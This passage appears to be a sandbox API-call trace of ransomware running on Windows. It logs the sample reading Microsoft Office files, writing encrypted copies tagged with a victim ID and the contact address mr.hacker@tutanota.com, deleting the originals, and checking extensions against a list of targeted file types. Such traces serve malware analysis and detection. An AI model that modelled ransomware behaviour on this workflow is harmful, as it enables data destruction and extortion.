out: lpNewFilePointer=0x0) returned 1 [0271.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.469] GetLastError () returned 0x0 [0271.469] ReadFile (in: hFile=0x2bc, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xbef29, lpOverlapped=0x0) returned 1 [0271.509] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xbef30, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xbef30, lpOverlapped=0x0) returned 1 [0271.521] ReadFile (in: hFile=0x2bc, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.521] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.521] SetEndOfFile (hFile=0x2a8) returned 1 [0271.521] CloseHandle (hObject=0x2a8) returned 1 [0271.521] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.521] SetEndOfFile (hFile=0x2bc) returned 1 [0271.773] CloseHandle (hObject=0x2bc) returned 1 [0271.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx")) returned 1 [0271.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.774] lstrlenW (lpString=".doc") returned 4 [0271.774] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.774] lstrlenW (lpString=".docx") returned 5 [0271.774] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.774] lstrlenW (lpString=".pdf") returned 4 [0271.774] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.774] lstrlenW (lpString=".xls") returned 4 [0271.774] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.774] lstrlenW (lpString=".xlsx") returned 5 [0271.774] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.774] lstrlenW (lpString=".ppt") returned 4 [0271.774] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.775] lstrlenW (lpString=".zip") returned 4 [0271.775] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString=".rar") returned 4 [0271.775] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString=".bz2") returned 4 [0271.775] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString=".7z") returned 3 [0271.775] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.775] lstrlenW (lpString=".dbf") returned 4 [0271.775] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.775] lstrlenW (lpString=".1cd") returned 4 [0271.775] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.775] lstrlenW (lpString=".jpg") returned 4 [0271.775] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.775] lstrlenW (lpString=".doc") returned 4 [0271.775] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString=".docx") returned 5 [0271.775] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.775] lstrlenW (lpString=".pdf") returned 4 [0271.775] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString=".xls") returned 4 [0271.775] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.775] lstrlenW (lpString=".xlsx") returned 5 [0271.775] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.775] lstrlenW (lpString=".ppt") returned 4 [0271.776] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.776] lstrlenW (lpString=".zip") returned 4 [0271.776] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.776] lstrlenW (lpString=".rar") returned 4 [0271.776] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.776] lstrlenW (lpString=".bz2") returned 4 [0271.776] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.776] lstrlenW (lpString=".7z") returned 3 [0271.776] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.776] lstrlenW (lpString=".dbf") returned 4 [0271.776] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.776] lstrlenW (lpString=".1cd") returned 4 [0271.776] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0271.776] lstrlenW (lpString=".jpg") returned 4 [0271.776] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.776] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0271.776] lstrlenW (lpString="CAGCAT10.DLL") returned 12 [0271.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0271.777] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=15776) returned 1 [0271.777] CloseHandle (hObject=0x2bc) returned 1 [0271.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll")) returned 0x20 [0271.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.778] lstrlenW (lpString=".doc") returned 4 [0271.778] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0271.778] lstrlenW (lpString=".docx") returned 5 [0271.778] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0271.778] lstrlenW (lpString=".pdf") returned 4 [0271.778] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0271.778] lstrlenW (lpString=".xls") returned 4 [0271.778] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0271.778] lstrlenW (lpString=".xlsx") returned 5 [0271.779] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0271.779] lstrlenW (lpString=".ppt") returned 4 [0271.779] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.779] lstrlenW (lpString=".zip") returned 4 [0271.779] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString=".rar") returned 4 [0271.779] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString=".bz2") returned 4 [0271.779] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0271.779] lstrlenW (lpString=".7z") returned 3 [0271.779] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0271.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.779] lstrlenW (lpString=".dbf") returned 4 [0271.779] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0271.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.779] lstrlenW (lpString=".1cd") returned 4 [0271.779] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0271.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.779] lstrlenW (lpString=".jpg") returned 4 [0271.779] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.779] lstrlenW (lpString=".doc") returned 4 [0271.779] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString=".docx") returned 5 [0271.779] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0271.779] lstrlenW (lpString=".pdf") returned 4 [0271.779] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString=".xls") returned 4 [0271.779] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0271.779] lstrlenW (lpString=".xlsx") returned 5 [0271.780] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0271.780] lstrlenW (lpString=".ppt") returned 4 [0271.780] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0271.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.780] lstrlenW (lpString=".zip") returned 4 [0271.780] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0271.780] lstrlenW (lpString=".rar") returned 4 [0271.780] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0271.780] lstrlenW (lpString=".bz2") returned 4 [0271.780] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0271.780] lstrlenW (lpString=".7z") returned 3 [0271.780] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0271.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.780] lstrlenW (lpString=".dbf") returned 4 [0271.780] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0271.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.780] lstrlenW (lpString=".1cd") returned 4 [0271.780] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0271.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0271.780] lstrlenW (lpString=".jpg") returned 4 [0271.780] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0271.780] lstrcmpiW (lpString1=".MMW", lpString2=".USA") returned -1 [0271.780] lstrlenW (lpString="CAGCAT10.MMW") returned 12 [0271.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0271.781] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=394200) returned 1 [0271.781] CloseHandle (hObject=0x2bc) returned 1 [0271.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 0x20 [0271.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0271.781] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.781] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0271.782] GetLastError () returned 0x0 [0271.782] ReadFile (in: hFile=0x2bc, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x603d8, lpOverlapped=0x0) returned 1 [0271.792] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x603e0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x603e0, lpOverlapped=0x0) returned 1 [0271.798] ReadFile (in: hFile=0x2bc, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.798] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.798] SetEndOfFile (hFile=0x348) returned 1 [0271.798] CloseHandle (hObject=0x348) returned 1 [0271.799] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.799] SetEndOfFile (hFile=0x2bc) returned 1 [0271.808] CloseHandle (hObject=0x2bc) returned 1 [0271.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.942] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.965] lstrlenW (lpString=".doc") returned 4 [0271.966] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0271.966] lstrlenW (lpString=".docx") returned 5 [0271.966] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0271.966] lstrlenW (lpString=".pdf") returned 4 [0271.966] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0271.966] lstrlenW (lpString=".xls") returned 4 [0271.966] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0271.966] lstrlenW (lpString=".xlsx") returned 5 [0271.966] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0271.966] lstrlenW (lpString=".ppt") returned 4 [0271.966] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.966] lstrlenW (lpString=".zip") returned 4 [0271.966] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0271.966] lstrlenW (lpString=".rar") returned 4 [0271.966] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0271.966] lstrlenW (lpString=".bz2") returned 4 [0271.966] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0271.966] lstrlenW (lpString=".7z") returned 3 [0271.966] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.966] lstrlenW (lpString=".dbf") returned 4 [0271.966] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.966] lstrlenW (lpString=".1cd") returned 4 [0271.966] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.966] lstrlenW (lpString=".jpg") returned 4 [0271.966] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.967] lstrlenW (lpString=".doc") returned 4 [0271.967] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0271.967] lstrlenW (lpString=".docx") returned 5 [0271.967] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0271.967] lstrlenW (lpString=".pdf") returned 4 [0271.967] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0271.967] lstrlenW (lpString=".xls") returned 4 [0271.967] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0271.967] lstrlenW (lpString=".xlsx") returned 5 [0271.967] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0271.967] lstrlenW (lpString=".ppt") returned 4 [0271.967] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0271.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.967] lstrlenW (lpString=".zip") returned 4 [0271.967] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0271.967] lstrlenW (lpString=".rar") returned 4 [0271.967] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0271.967] lstrlenW (lpString=".bz2") returned 4 [0271.967] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0271.967] lstrlenW (lpString=".7z") returned 3 [0271.967] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0271.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.967] lstrlenW (lpString=".dbf") returned 4 [0271.967] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0271.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.967] lstrlenW (lpString=".1cd") returned 4 [0271.967] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0271.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0271.967] lstrlenW (lpString=".jpg") returned 4 [0271.967] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0271.968] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0271.968] lstrlenW (lpString="LINES.DLL") returned 9 [0271.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.997] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=15256) returned 1 [0271.997] CloseHandle (hObject=0x394) returned 1 [0271.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll")) returned 0x20 [0271.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0271.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0271.999] lstrlenW (lpString=".doc") returned 4 [0271.999] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0271.999] lstrlenW (lpString=".docx") returned 5 [0271.999] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0271.999] lstrlenW (lpString=".pdf") returned 4 [0271.999] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0271.999] lstrlenW (lpString=".xls") returned 4 [0271.999] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0271.999] lstrlenW (lpString=".xlsx") returned 5 [0271.999] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0271.999] lstrlenW (lpString=".ppt") returned 4 [0271.999] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0271.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.000] lstrlenW (lpString=".zip") returned 4 [0272.000] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.000] lstrlenW (lpString=".rar") returned 4 [0272.000] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.000] lstrlenW (lpString=".bz2") returned 4 [0272.000] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.000] lstrlenW (lpString=".7z") returned 3 [0272.000] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.000] lstrlenW (lpString=".dbf") returned 4 [0272.000] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.000] lstrlenW (lpString=".1cd") returned 4 [0272.000] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.000] lstrlenW (lpString=".jpg") returned 4 [0272.000] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.000] lstrlenW (lpString=".doc") returned 4 [0272.000] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.000] lstrlenW (lpString=".docx") returned 5 [0272.000] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.000] lstrlenW (lpString=".pdf") returned 4 [0272.000] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.000] lstrlenW (lpString=".xls") returned 4 [0272.000] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.000] lstrlenW (lpString=".xlsx") returned 5 [0272.000] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.001] lstrlenW (lpString=".ppt") returned 4 [0272.001] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.001] lstrlenW (lpString=".zip") returned 4 [0272.001] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.001] lstrlenW (lpString=".rar") returned 4 